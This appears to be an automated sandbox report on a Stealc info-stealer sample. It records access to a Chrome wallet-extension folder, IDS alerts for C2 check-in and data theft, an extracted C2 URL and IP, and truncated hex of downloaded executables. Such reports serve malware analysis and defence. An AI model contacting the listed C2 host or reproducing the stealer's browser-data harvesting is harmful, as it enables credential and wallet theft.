Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0

Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\HrxOpVxK5d.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 30MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49699 -> 77.220.212.32:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49699 -> 77.220.212.32:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 77.220.212.32:80 -> 192.168.2.7:49699
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49699 -> 77.220.212.32:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 77.220.212.32:80 -> 192.168.2.7:49699
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49699 -> 77.220.212.32:80
Source: Network traffic	Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.7:52982 -> 77.220.212.32:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://77.220.212.32/eb51242cada87444.php
Source: Malware configuration extractor	URLs: http://77.220.212.32/eb51242cada87444.php

Source: global traffic	TCP traffic: 192.168.2.7:52974 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.7:49784 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 09 Nov 2024 01:47:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 09 Nov 2024 01:47:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 09 Nov 2024 01:47:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 09 Nov 2024 01:47:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 09 Nov 2024 01:47:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 09 Nov 2024 01:47:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 09 Nov 2024 01:47:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 